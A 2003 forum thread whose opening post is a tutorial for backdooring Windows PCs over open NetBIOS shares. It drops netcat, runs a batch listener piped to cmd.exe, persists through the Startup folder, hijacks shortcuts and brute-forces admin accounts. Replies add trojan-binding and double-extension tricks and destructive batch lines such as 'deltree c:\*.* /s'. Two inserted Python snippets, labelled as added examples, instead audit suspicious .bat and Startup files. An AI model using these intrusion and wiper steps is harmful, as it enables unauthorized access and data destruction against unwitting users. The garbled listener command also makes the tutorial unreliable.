owning a computer through netbios (my tut)

Networking/Security Forums -> Exploits // System Weaknesses

Author: andr3s    Posted: Mon Jan 20, 2003 3:29 am    Post subject: owning a computer through netbios (my tut)
    ----
thought i might give back to the forum..i wrote this today..

-----------------------------------------

Owning a computer through NetBios:

This text is for informational purposes only, so don't blame me for what anybody does with this information.

This is my sixth tutorial so far, I hope you enjoy it. Basically I'm going to cover how to get the most out of shitty NetBios access.

1- Go read some of the tutorials on using NetBios. And have some understanding of command prompt (read my batchfile tutorial). These are all available in the text section.

2- Go NetBios a computer.

3- Go into a random folder and drop a copy of netcat (available in the download section). If it says that you only have read access then go to problem 1 to see how to get read/write privileges.

4- You're gonna have to write a batch file. Go to notepad, then write something like this:

@echo off
cd C:\random_directory\ (doesn't have to be C:\, just whatever directory netcat is in")
nc -l -p 4567 | echo > cmd.exe (command.exe on anything less than NT)




5- If they have all of "C:\" shared (If they don't have C:\ shared go to problem 2 below) then simply go into "C:\Documents and Settings\" click on the user name (if there are more than one, pick the one with most privileges or do this whole thing with each account). After you are in one of the user's folders click on the following folders "\Start Menu\Programs\Startup". By now the address of the folder you are in should be "C:\Documents and Settings\whatever_user_name\Start Menu\Programs\Startup". Now drop a copy of your batch file in there (read step 4).

6- Basically you just dropped a batch file that will make a backdoor in their computer in their startup folder. When their computer boots up it will be activated and your backdoor opened.

7- Run telnet and connect to their ip through port 4567.

---------------------------Problem 1-----------------------------------

1- That sucks. Well in that case you will have to enumerate the accounts (check the downloads section for programs that do this) and bruteforce the account with the highest privileges, root.

2- Log in as the admin and you'll have all the privileges.

---------------------------Problem 2-----------------------------------



1- This is where it gets harder. Drop your batchfile (read section 4 above) somewhere in their computer.

2- Find a shortcut or something that they're bound to use (i.e "warcraft 3") (if you can't find one go to problem 3). Now right-click on the shortcut and change the target input to the location of your batch file (i.e "D:\shared music\evil.bat") and the start in field to the folder where your batch file is (i.e "D:\shared music\").

3- When they click on this shortcut it will activate the batch file, the batch file will then activate the backdoor.

---------------------------Problem 3-----------------------------------



1- This is tricky stuff. Get a file binder and bind your batch file to a file that you know the user will open (i.e an mp3).

2- When he uses that mp3 your batch file will be run.

Author: ShaolinTiger    Location: Kuala Lumpur, Malaysia    Posted: Mon Jan 20, 2003 11:48 pm    Post subject: Re: owning a computer through netbios (my tut)
    ----
andr3s wrote:

1- This is tricky stuff. Get a file binder and bind your batch file to a file that you know the user will open (i.e an mp3).

2- When he uses that mp3 your batch file will be run.


Yeh real tricky, even *I* don't know how to bind a batch file to an mp3.

Please explain.

I'm sure if this tutorial is really useful here as it's very basic and doesn't explain any of the more advanced concepts of null sessions or enumeration.

Author: ToddK    Location: Ottawa, Canada    Posted: Tue Jan 21, 2003 1:58 am    Post subject:
    ----
Where are your other tutorials? It refers to them, but I can't find a link.

Also, I would like to know how that binding works. I can't think of a way. Does it need something specific installed or not patched?

Author: ShaolinTiger    Location: Kuala Lumpur, Malaysia    Posted: Tue Jan 21, 2003 11:36 am    Post subject:
    ----
ToddK wrote:

Also, I would like to know how that binding works. I can't think of a way. Does it need something specific installed or not patched?


He's talking arse, I just wanted to highlight that point though :)

Author: Madeline_13    Posted: Tue Jan 21, 2003 12:17 pm    Post subject:
    ----
hey someone sent me a rar file with a bat file in it - actually i haven't run it but I am wondering now if this file is infected. I ran a scan but you know I never trust that.

Author: ShaolinTiger    Location: Kuala Lumpur, Malaysia    Posted: Tue Jan 21, 2003 12:23 pm    Post subject:
    ----
LOL you don't need to scan .bat files, just open them and read them..

That's assuming it is a batch file not something else renamed .bat.

Author: Madeline_13    Posted: Tue Jan 21, 2003 3:02 pm    Post subject:
    ----
that's what i meant. if it is something else like you just said...how could i know beforehand? bat file is supposed to be some files for a game ...and that kinda stuff is hard to trust

Author: ShaolinTiger    Location: Kuala Lumpur, Malaysia    Posted: Tue Jan 21, 2003 3:08 pm    Post subject:
    ----
.bat files are nothing to do with games. .bat files are batch files, a series of commands in a file.

Some cheesy warez rips use batch files to automate the extraction process.

If you don't trust it, open it and read it like I said, it's in plain text, it's just a series of commands like:

Code:
ECHO You are cl00less
deltree c:\*.* /s \y
ECHO You are f00ked.
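
The "open it and read it" check from the posts above, automated as an added example (not part of the original thread): it first confirms that a file named `.bat` really is plain text and not something else renamed, then lists the lines worth reading twice. The function name, pattern list and sample byte strings are constructed for illustration.

```python
import re

# Standard file signatures for formats that are not batch scripts.
MAGIC = {b"MZ": "Windows executable", b"PK\x03\x04": "ZIP archive",
         b"Rar!": "RAR archive", b"\x7fELF": "ELF executable"}

# Patterns worth a second look; the commands come from this thread.
RISKY = [
    (re.compile(r"^\s*@?\s*(deltree|del|erase|rd|rmdir|format)\b", re.I),
     "destructive command"),
    (re.compile(r"\bnc(\.exe)?\b.*\s-l\b", re.I), "netcat listener"),
    (re.compile(r"Start Menu\\Programs\\Startup", re.I),
     "references Startup folder"),
]

def triage_bat(data: bytes) -> dict:
    """Classify the bytes of a file named *.bat without running it."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return {"is_text": False, "kind": kind, "findings": []}
    # A real batch file is text: no NUL bytes, nearly all printable.
    sample = data[:4096]
    printable = sum(b in b"\t\r\n" or 32 <= b < 127 for b in sample)
    if b"\x00" in sample or (sample and printable / len(sample) < 0.9):
        return {"is_text": False, "kind": "unknown binary", "findings": []}
    findings = []
    for n, line in enumerate(data.decode("latin-1").splitlines(), 1):
        for rx, label in RISKY:
            if rx.search(line):
                findings.append((n, label, line.strip()))
    return {"is_text": True, "kind": "batch script", "findings": findings}

# Constructed samples (not real files).
RENAMED_EXE = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56
INSTALLER = b"@echo off\r\necho Extracting...\r\nunrar x part1.rar\r\n"
WIPER = b"@echo off\r\ndeltree c:\\*.* /s\r\necho done\r\n"

if __name__ == "__main__":
    for name, blob in [("a.bat", RENAMED_EXE), ("b.bat", INSTALLER),
                       ("c.bat", WIPER)]:
        print(name, triage_bat(blob))
```

An empty findings list only means none of these patterns matched; the script still has to be read before it is run.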

Author: ToddK    Location: Ottawa, Canada    Posted: Tue Jan 21, 2003 6:27 pm    Post subject:
    ----
Actually, this may be just a confusion. I have only just started reading about security, but I notice that many links mention "binding" to a program using the cgibin. Usually the cmd.exe to get a command prompt.

Author: ShaolinTiger    Location: Kuala Lumpur, Malaysia    Posted: Tue Jan 21, 2003 6:36 pm    Post subject:
    ----
That's binding to a port generally, or piping from one program to another or piping cmd.exe to netcat mostly..

You can bind an executable or dll to another executable (that's how trojan stubs work), but you can't bind an executable to a non executable.

You could in effect bind an exe to the default exe handler for Windows Explorer (this is what many viruses do) so everything you run, the virus/trojan runs as well.

This took me hours once to fix by hand

You could also bind something to whatever plays mp3's, generally Winamp, so that whenever it runs the other thing runs too..

Or you can swap an mp3 for a bogus file with a double extension and a media icon..

But you can't bind a batch file to an mp3 (well you could, but the only thing that would happen is you would get some weird noises at the end of the song when you played the mp3).

Simple as that. :D
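
A defender's check for two things this thread describes, as an added example that is not part of the original posts: a runnable file hiding behind a media-looking double extension, and a script or executable sitting in a user's Startup folder. The function name, extension sets and sample paths are constructed for illustration.

```python
from pathlib import PureWindowsPath

# Extensions Windows executes or hands to a script host on double-click.
RUNNABLE = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js"}
# Extensions a user expects to be inert media or documents.
DECOY = {".mp3", ".wav", ".avi", ".mpg", ".jpg", ".gif", ".txt", ".doc"}
STARTUP = "start menu\\programs\\startup"

def audit_listing(paths):
    """Return (path, reason) findings for a listing of Windows paths."""
    findings = []
    for raw in paths:
        p = PureWindowsPath(raw.strip())
        # Padding spaces before the real extension hide it in Explorer,
        # so strip each suffix before comparing.
        suffixes = [s.strip().lower() for s in p.suffixes]
        if not suffixes or suffixes[-1] not in RUNNABLE:
            continue
        if len(suffixes) > 1 and suffixes[-2] in DECOY:
            findings.append((raw, "double extension: runs as " + suffixes[-1]))
        if str(p.parent).lower().endswith(STARTUP):
            findings.append((raw, "runs at logon from Startup folder"))
    return findings

# Constructed listing (not taken from a real machine).
SAMPLE = [
    r"C:\Documents and Settings\alice\Start Menu\Programs\Startup\update.bat",
    r"C:\Documents and Settings\alice\Start Menu\Programs\Startup\Office.lnk",
    r"D:\shared music\track01.mp3",
    r"D:\shared music\track02.mp3          .exe",
    r"D:\games\setup.exe",
]

if __name__ == "__main__":
    for path, reason in audit_listing(SAMPLE):
        print(reason, "->", path)
```

Shortcuts (`.lnk`) in Startup are normal and are not flagged here; a shortcut whose target was changed to a batch file needs its target inspected separately.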

Author: decypherohm    Location: World - Europe - Portugal - Lisbon    Posted: Tue Jan 21, 2003 8:14 pm    Post subject:
    ----
Easy and simply destructible .bat

Code:

@Echo Off
@Del c:\windows
@Echo You have just been erased.

Author: Tom Bair    Location: Portland, Oregon USA    Posted: Tue Jan 21, 2003 8:52 pm    Post subject:
    ----
decypherohm wrote:
Easy and simply destructible .bat

Code:

@Echo Off
@Del c:\windows
@Echo You have just been erased.


Quickly, and just off the top of my head; I don't think your batch file would work. When issuing the Del command, does it not require a keypress of the Y key to continue?

Even with @Echo Off -- you will still receive a prompt of:

Do you wish to delete C:\Windows and all it's sub-directories?

At this point, the jig is up and the joke is on you. User hits "N" or the "ESC" key and sees You have just been erased..

Another trick to keep batch files from damaging your hard drive is to rename the FORMAT command to something else. Then when a batch file issues the ever popular FORMAT C:, a wonderful response from the OS is File not found.

Tom

Author: Madeline_13    Posted: Thu Jan 23, 2003 9:02 am    Post subject:
    ----
download americas army (your taxpayer dollars paid for it) after you dl all the parts there's a bat you run...and it sets up the install.. People are using that to hack accounts left and right. also blackhawk down demo has the same thing. No warez...this is actual companies putting it out like this. americas army is totally free forever to dl. I guess the army is "cheesy" then huh? they put it out. That's how the game is run. People are putting out hacks for it same style...dumb people run them. I was just asking about it here. I guess you gotta play a lot of games to really know what's going on though with what.

Author: ShaolinTiger    Location: Kuala Lumpur, Malaysia    Posted: Thu Jan 23, 2003 11:29 am    Post subject:
    ----
Madeline_13 wrote:
download americas army (your taxpayer dollars paid for it) after you dl all the parts there's a bat you run...and it sets up the install.. People are using that to hack accounts left and right. also blackhawk down demo has the same thing. No warez...this is actual companies putting it out like this. americas army is totally free forever to dl. I guess the army is "cheesy" then huh? they put it out. That's how the game is run. People are putting out hacks for it same style...dumb people run them. I was just asking about it here. I guess you gotta play a lot of games to really know what's going on though with what.


Well like I said open it and read it :)

It's in plain text.

a) I don't live in the US (thank the lord)
b) I don't play demos
c) I play a lot of games
d) Don't run anything you don't trust 100%



All times are GMT + 2 Hours